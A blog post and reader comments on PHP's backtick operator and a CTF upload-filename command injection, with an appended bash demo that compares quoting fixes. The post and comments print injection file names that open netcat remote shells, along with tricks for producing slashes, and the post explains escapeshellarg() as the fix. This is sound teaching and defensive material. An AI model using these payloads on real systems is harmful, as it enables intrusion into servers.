Fun with Backticks

While chatting with some people at OWASP AppSecEU 08 I noticed that backticks are often overlooked in PHP. I came across backticks myself only some time ago while researching vulnerable functions on php.net for my PHP scanner and found this entry. So you can use something like

$foo = `command here`;

to execute OS commands just like with system(), shell_exec() and the rest. This was absolutely new to me, although I've been working with PHP for quite a while, and it is easily overlooked when reviewing code or grepping for the functions just mentioned (which is a bad idea anyway ;)). Note that the backtick operator is only disabled when shell_exec() itself is disabled through disable_functions; a blacklist that names system() and exec() does nothing against it, and a code review that searches for function names will not see it either.

While talking about backticks I remembered a quite interesting security hole from the UCSB CTF 07 (in the service "copyright", for those of you who participated or want to have a go at the image). The service allowed file uploads and the relevant PHP code looked like the following:

// Vulnerable code from the CTF service, kept as it was: basename() strips
// directories from the client-supplied name but leaves ; ` $ and spaces in it.
$target_path = "../../uploads/". basename( $_FILES['file']['name']);
// Only tmp_name is escaped; $target_path goes into the command line unquoted.
$command = "cp ".escapeshellarg($_FILES['file']['tmp_name'])." ".$target_path;
exec($command, $out, $ret);

If you take a closer look at the code you will see that you can execute commands by naming the file you upload something like

foo;ping localhost

since ";" is allowed in file names and appends a new command after the cp. The problem was that we needed slashes in our file name to run "foo;nc -l -p 2222 -e /bin/bash" or to copy some interesting files into the web directory with "../../../../var/www/Site". Obviously you cannot name your file with a slash or craft such a request, because the name is still handled as a file name: slashes count as directory separators and the basename() call throws away everything up to the last one. Then my mate Freddy had the idea to use backticks again, because on the command line they work just as in PHP: they execute a command and substitute its output:

foo;nc -l -p 2222 -e `nc -l -p 3333`

The shell evaluates the backticks first, so this waits for a connection on port 3333; whatever is sent there becomes the argument of -e, and only then does the listener on port 2222 start and execute that program for whoever connects. So we connect to port 3333, send /bin/bash, connect to port 2222 and finally get a remote shell.
As we figured out afterwards this was a fairly roundabout way of doing what nc -l -p 2222 -e `which bash` does on its own, but it was plain fun anyway during the contest.

Also interesting to note: on the command line, backticks are expanded inside double quotes but not inside single quotes. That is exactly why escapeshellarg(), which wraps its argument in single quotes, made the tmp_name part safe while the unquoted $target_path stayed injectable. The straightforward fix is to pass $target_path through escapeshellarg() as well, or better, to use move_uploaded_file() and not touch the shell at all.


5 Responses to Fun with Backticks

  1. Anonymous says:

    Interesting bug. There are, of course, lots of tricks to encode characters in a shell command. Here's one using only builtin shell commands:

    file; S=$(echo -e "\x2F"); eval "nc -l -p 1337 -e ${S}bin${S}bash";

    $(command) is equivalent to `command`. You could also use sed, tr, perl, etc to encode/decode strings if those programs are available.

  2. Reiners says:

    Hi!
    Unfortunately this won't work because you can't fake a "\" in file names 😉
    Anyway, thanks for sharing your idea!

  3. Reiners says:

    another idea to get a slash on command line would be:
    `pwd|head -c1`
    This returns the current directory's first character, which should always be a "/".

  4. Freddy says:

    Even better: ${PWD:0:1} is shorter and doesn't actually run a command.

  5. bhavana says:

    It can be escaped by using the / symbol.
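The injection described in the post and the slash tricks from comments 3 and 4, as an added example that is not part of the original post, its comments or the CTF service. It rebuilds the service's command string in a throwaway directory, runs it through a shell the way PHP's exec() does, and reports whether a payload smuggled in the upload file name actually executed. Everything in it is constructed for the demo: the directory layout, the payloads, the "pwned" marker file, and a bash stand-in for PHP's escapeshellarg(); bash -c stands in for the /bin/sh that exec() really uses.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post. Simulates the vulnerable
# "cp <tmp_name> <target>" construction and compares three ways of quoting
# the attacker-controlled target path.

# Stand-in for PHP's escapeshellarg(): single-quote the argument and turn
# any embedded ' into '\'' so the shell sees exactly one literal word.
escapeshellarg() {
  printf "'%s'" "$(printf '%s' "$1" | sed "s/'/'\\\\''/g")"
}

# Build the command as the service did. Only the tmp path is escaped; the
# quoting of the target is selectable so the variants can be compared:
#   none   - the original code: target unquoted
#   double - target in double quotes: stops ';' but not backticks or $( )
#   single - target through escapeshellarg(): the fix
build_command() {
  local quoting="$1" tmp="$2" filename="$3" name target
  name=$(basename "$filename")      # basename() drops directories, nothing else
  case "$quoting" in
    none)   target="../../uploads/$name" ;;
    double) target="\"../../uploads/$name\"" ;;
    single) target=$(escapeshellarg "../../uploads/$name") ;;
    *)      echo "unknown quoting: $quoting" >&2; return 1 ;;
  esac
  printf 'cp %s %s' "$(escapeshellarg "$tmp")" "$target"
}

# Simulate one upload: <work>/site/app is the directory the cp runs from,
# <work>/uploads the upload target. The built command is run with bash -c,
# then the tree is searched for the marker file a successful injection
# creates. Prints the marker's path relative to <work>, or "clean".
run_upload() {
  local quoting="$1" filename="$2" work tmp cmd hit
  work=$(mktemp -d)
  mkdir -p "$work/site/app" "$work/uploads"
  tmp=$(mktemp "$work/phpXXXXXX")   # like PHP's tmp_name: no metacharacters
  cmd=$(build_command "$quoting" "$tmp" "$filename")
  (cd "$work/site/app" && bash -c "$cmd") >/dev/null 2>&1 || true
  hit=$(cd "$work" && find . -name pwned | head -n1)
  rm -rf "$work"
  if [ -n "$hit" ]; then printf '%s\n' "${hit#./}"; else echo clean; fi
}

# Constructed payloads; each is a legal file name (no slash, no NUL). The
# single quotes keep backticks and ${...} literal here; the shell inside
# run_upload is the one that expands them.
P_SEMI='foo;touch pwned'                 # the post's "foo;ping localhost" idea
P_TICK='foo`touch pwned`'                # backticks survive double quotes
P_SLASH='foo;touch ..${PWD:0:1}pwned'    # comment 4's slash: writes one level up

# Print the full matrix of quoting style versus payload.
demo() {
  printf '%-7s %-34s %s\n' quoting filename result
  for q in none double single; do
    for p in "$P_SEMI" "$P_TICK" "$P_SLASH"; do
      printf '%-7s %-34s %s\n' "$q" "$p" "$(run_upload "$q" "$p")"
    done
  done
}

demo
```

The "none" rows show the service as shipped: every payload runs, and P_SLASH lands the marker in site/ without a single slash in the file name. The "double" rows show why double quotes are not a fix: the ; payload becomes a harmless file name, but the backtick payload still executes. Only the "single" rows, which quote the target with escapeshellarg(), are clean throughout. The ${PWD:0:1} expansion is a bash extension; PHP's exec() hands the string to /bin/sh, so on a system where /bin/sh is dash only the pwd|head -c1 form from comment 3 produces the slash.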
